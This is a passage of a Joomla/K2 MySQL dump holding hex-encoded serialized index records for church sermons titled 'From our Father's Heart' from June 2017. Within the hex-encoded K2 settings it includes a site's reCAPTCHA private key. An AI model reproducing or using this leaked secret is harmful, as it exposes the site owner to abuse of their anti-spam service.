7c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223232223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2235303a66726f6d2d6f75722d6661746865722d732d68656172742d30342d30362d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f35302d66726f6d2d6f75722d6661746865722d732d68656172742d30342d30362d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3530223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35303a66726f6d2d6f75722d6661746865722d732d68656172742d30342d30362d32303137223b733a353a227469746c65223b733a39343a22596f7572206f62656469656e6365206973207768617420636f6e6e6563747320796f7520746f207468652073757065726e61747572616c202d2046726f6d206f7572204661746865722773204865617274202830342f30362f3230313729223b733a31313a226465736372697074696f6e223b733a3334363a2220446561726c792042656c6f7665642c20596f7572206f62656469656e6365206973207768617420636f6e6e6563747320796f7520746f207468652073757065726e61747572616c2e20556e74696c20796f7520626567696e20746f2074616b6520746865206973737565206f66206f626579696e6720476f64207665727920736572696f757320796f752077696c6c206b656570206265696e6720637574206f66662066726f6d206d697261636c657320616e64207468652073757065726e61747572616c2e205065726861707320796f752068617665206b65707420776f6e646572696e672077687920796f7520686172646c7920657870657269656e6365206d697261636c6573206f72206974207365656d732074686174207468652073757065726e61747572616c206973206e6f74207265616c206265636175736520796f7520646f6e277420657870657269656e63652069742e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30362d30342031313a32353a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30362d30342031313a32353a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(274, 'index.php?option=com_k2&view=item&id=51', 'index.php?option=com_k2&view=item&id=51:god-is-committed-to-financing-and-funding-your-primary-purpose-from-our-father-s-heart-11-06-2017', 'God is Committed to Financing and Funding your Primary Purpose - From our Father\'s Heart (11/06/2017)', ' GOD IS COMMlTTED TO FINANCING AND FUNDING YOUR PRIMARY PURPOSE. Jeremiah l:S \"Before I formed thee in the belly I knew thee; and before thou camest forth out of the womb I sanctified thee, and I ordained thee a prophet unto the nations. \" In this kingdom, there are primary purposes as well as secondary purposes. The commitment of God in the life of a man is always towards the primary purpose of God. ', '2017-06-25 14:19:44', 'aef01163451b71f46822338f3a0bb8da', 1, 1, 1, '*', '2017-06-11 12:16:04', '0000-00-00 00:00:00', '2017-06-11 12:16:04', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223531223b733a353a22616c696173223b733a39373a22676f642d69732d636f6d6d69747465642d746f2d66696e616e63696e672d616e642d66756e64696e672d796f75722d7072696d6172792d707572706f73652d66726f6d2d6f75722d6661746865722d732d68656172742d31312d30362d32303137223b733a373a2273756d6d617279223b733a3433313a223c703e474f4420495320434f4d4d6c5454454420544f2046494e414e43494e4720414e442046554e44494e4720594f5552205052494d41525920505552504f53452ec2a03c2f703e0d0a3c703e4a6572656d696168206c3a5320224265666f7265204920666f726d6564207468656520696e207468652062656c6c792049206b6e657720746865653b20616e64206265666f72652074686f752063616d65737420666f727468206f7574206f662074686520776f6d6220492073616e6374696669656420746865652c20616e642049206f726461696e6564207468656520612070726f7068657420756e746f20746865206e6174696f6e732e2022c2a03c2f703e0d0a3c703e496e2074686973206b696e67646f6d2c20746865726520617265207072696d61727920707572706f7365732061732077656c6c206173207365636f6e6461727920707572706f7365732e2054686520636f6d6d69746d656e74206f6620476f6420696e20746865206c696665206f662061206d616e20697320616c7761797320746f776172647320746865207072696d61727920707572706f7365206f6620476f642e3c2f703e0d0a223b733a343a22626f6479223b733a323537373a220d0a3c703e476f642077696c6c206e6f742066756e6420616e642066696e616e63652061207365636f6e6461727920707572706f736520746f2063616e63656c20486973207072696d61727920707572706f736520696e20796f7572206c6966652e20546865207072696d61727920707572706f736573206f6620476f6420617265207468696e677320636f6e6e656374656420746f207468652070726f6772616d206f6620476f6420696e2061206d616e2773206c6966652c20692e652e2074686f7365207468696e677320636f6e747269627574696e6720746f207768617420476f6420697320646f696e6720696e206869732067656e65726174696f6e2e204576657279206f74686572207468696e6773206f757473696465206f66207468617420617265207365636f6e6461727920707572706f7365732ec2a03c2f703e0d0a3c703e486520746f6c64204a6572656d6961682c202e2e2e2e2e2049206f726461696e656420796f7520612070726f7068657420756e746f20746865206e6174696f6e732e204966204a6572656d69616820626164206265636f6d6520616e797468696e67206f757473696465206f66206265696e6720612070726f70686574206f6620476f642c20686520776f756c642068617665206661696c6564206265636175736520746861742077617320686973207072696d61727920707572706f73652e20546865207265736f757263657320616e6420616c6c6f636174696f6e73206f662048656176656e2061726520616c7761797320696e207468617420646972656374696f6e2e3c2f703e0d0a3c703e41206c6f74206f662070656f706c65206661636520646966666963756c7469657320616e64207374727567676c65206f6e2074686520726f6164206f66206f62656469656e6365206265636175736520746865792068617665207368696674656420746865697220617474656e74696f6e2066726f6d20746865207072696d61727920707572706f736520c2a0616e6420646976696e652066756e64696e6720616e6420636f6d6d69746d656e742068617320616c736f206265656e2077697468647261776e2066726f6d207468656972206c697665732ec2a03c2f703e0d0a3c703e4a6f7365706820626563616d6520746865205072696d65204d696e697374657220696e2045677970742062757420746861742077617320746865207365636f6e6461727920707572706f73652e20546865207072696d61727920707572706f73652077617320746f206265206120736176696f757220616e6420c2a0707265736572766572206f666c737261656c20616e6420686520756e64657273746f6f6420746861742e2054686174207761732077687920686520656e6a6f7965642074686520636f6d6d69746d656e74206f662048656176656e2e20486520666f6375736564206f6e2066756c66696c6c696e6720746865207072696d61727920707572706f736520616e6420476f6420646964206e6f74206d696e642068696d20656e6a6f79696e6720746865207365636f6e6461727920707572706f73652e204920746f6c6420796f752c20657665727920706f736974696f6e20616e6420706c6174666f726d20476f6420676976657320696e206c69666520636f6d657320776974682074776f207468696e67733a494e464c55454e434520616e64204146464c55454e43452e2054686520696e666c75656e636520697320746865207072696d61727920707572706f7365207768696c6520746865206166666c75656e636520697320746865207365636f6e6461727920707572706f73652e20476f642077696c6c206e6f74206d696e6420796f7520656e6a6f79696e6720746865206166666c75656e6365206f6e63652074686520696e666c75656e636520686173206265656e20636f72726563746c79207574696c697a65642e3c2f703e0d0a3c703e42656c6f7665642c207768617420697320746865207072696d61727920707572706f7365206f6620776865726520796f7520617265207269676874206e6f773f20496e207468617420636f756e7472792c207374617465206f7220636974792c207468617420706c616365206f6620617574686f726974792c207468617420706f736974696f6e206f6620706f7765722e2041726520796f752061637475616c6c792066756c66696c6c696e6720746865207072696d61727920707572706f7365206f6620476f642074686572653f20596f75206e65656420746f20c2a0616e737765722074686174207175657374696f6e20746f646179206265666f726520697420697320746f6f206c6174652e204d617920626520796f7520617265206c696b65204573746865722077686f20476f642068617320616c6c6f77656420696e746f20746865206b696e67646f6d20666f72207375636820612074696d6520617320746869732e2045737468657220616c6d6f7374206d6973736564206974206275742074686520766f696365206f66207468652066617468657220696e20686572206c6966653b204d6f7264656361692068656c70656420c2a068657220616e642073686520676f742069742072696768742e205368652066756c66696c6c656420746865207072696d61727920707572706f7365206f66206265696e67206120736176696f7572206f66206865722070656f706c65207768696c6520656e6a6f79696e6720746865207365636f6e6461727920707572706f7365206f66206265696e67206120717565656e20696e20746865206c616e642e20c2a03c2f703e0d0a3c703e4a65737573206f77c2b720536176696f7572206b6e6577207768617420486973207072696d61727920707572706f7365207761732c207468617420697320746f20646965206f6e207468652063726f73732e20416c74686f7567682c2048652064696420736f206d616e79206f74686572207468696e6773206f6e204869732077617920746f2074686520c2a07072696d61727920707572706f7365206c696b65206865616c696e6720746865207369636b2c2072616973696e672074686520646561642062757420486973207072696d61727920707572706f73652064726f76652048696d20756e74696c2048652066756c66696c6c656420746861742e20312077616e7420796f7520746f20636865636b20796f7572206c69666520616e64207365652077686572652065786163746c7920796f752061726520636f6d70726f6d6973696e67206f7220676976696e67206c65737320617474656e74696f6e20746f20c2a0796f7572207072696d61727920707572706f736520616e64206d616b65206e65636573736172792061646a7573746d656e74732e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732ec2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c614172656f67756e2ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30362d32352031333a30333a3032223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5